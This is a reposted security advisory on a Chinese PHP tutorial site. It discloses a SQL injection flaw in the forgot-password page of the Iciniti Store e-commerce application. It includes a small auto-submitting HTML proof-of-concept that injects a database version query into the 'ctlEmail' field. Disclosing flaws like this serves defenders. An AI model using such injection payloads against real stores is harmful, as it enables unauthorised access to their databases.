来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] Sense of Security - Security Advisory - SOS-12-003影响产品:Iciniti Store平台: Windows影响版本 4.3.3683.31484已确认,其他版本也有可能高位级别影响 Manipulation of data攻击者 远程无认证......
|
Sense of Security - Security Advisory - SOS-12-003
影响产品:Iciniti Store 平台: Windows 影响版本 4.3.3683.31484已确认,其他版本也有可能 高位级别 影响 Manipulation of data 攻击者 远程无认证 解决方案:联系Iciniti进行升级 注释 Iciniti Store is a web application providing e-commerce and payment solutions. The application suffers from a SQL injection vulnerability in logon_forgot_password.aspx. It fails to validate data supplied in the 'ctlEmail' variable before being used in an SQL query. Proof of Concept. <html> <head></head> <body onLoad=javascript:document.form.submit()> <form action=" http://www.2cto.com /logon_forgot_password.aspx" name="form" method="POST"> <input type="text" name="ctlEmail" value="SELECT @@VERSION"> <input type="text" name="btnSubmit" value="Submit"> </form> </body> </html> |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
